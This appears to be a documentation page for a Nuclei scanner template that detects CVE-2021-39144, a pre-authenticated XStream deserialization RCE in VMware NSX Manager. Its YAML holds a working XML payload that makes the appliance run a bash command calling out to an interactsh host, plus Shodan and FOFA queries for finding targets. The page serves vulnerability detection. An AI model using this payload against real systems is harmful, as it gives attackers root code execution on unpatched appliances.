VMware NSX Manager XStream Pre-authenticated Remote Code Execution
ID: vmware-nsx-stream-rce
Severity: high
Author: _0xf4n9x_
Tags: vmware,xstream,rce,msf,intrusive
Description
Section titled “Description”VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),a malicious actor can get remote code execution in the context of ‘root’ on the appliance.VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13are vulnerable to Remote Command Injection.
YAML Source
Section titled “YAML Source”id: vmware-nsx-stream-rce
info: name: VMware NSX Manager XStream Pre-authenticated Remote Code Execution author: _0xf4n9x_ severity: high description: | VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of 'root' on the appliance. VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to Remote Command Injection. reference: - https://www.vmware.com/security/advisories/VMSA-2022-0027.html - https://kb.vmware.com/s/article/89809 - https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html - https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144 - https://github.com/rapid7/metasploit-framework/pull/17222 metadata: verified: true max-request: 2 shodan-query: title:"VMware Appliance Management" fofa-query: title="VMware Appliance Management" tags: vmware,xstream,rce,msf,intrusivevariables: lowerrstr: "{{to_lower(rand_text_alpha(6))}}"
http: - raw: - |- PUT /api/2.0/services/usermgmt/password/{{lowerrstr}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml
<sorted-set> <string>foo</string> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>bash</string> <string>-c</string> <string>ping {{os}}.{{interactsh-url}}</string> </command> </target> <action>start</action> </handler> </dynamic-proxy> </sorted-set>
payloads: os: - '-c 3 lin' - '-n 3 win' stop-at-first-match: true
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns"
- type: word part: body words: - 'deceptive request routing'
- type: status status: - 400# digest: 4b0a004830460221008124c5034dbebf720c8a01ada2bc79754d93b6604691ba40ce67dbd15535e7b6022100c295935cbd3d25b65a14322c1d080e12a8387519691e3283ba2ad48a98da623f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml"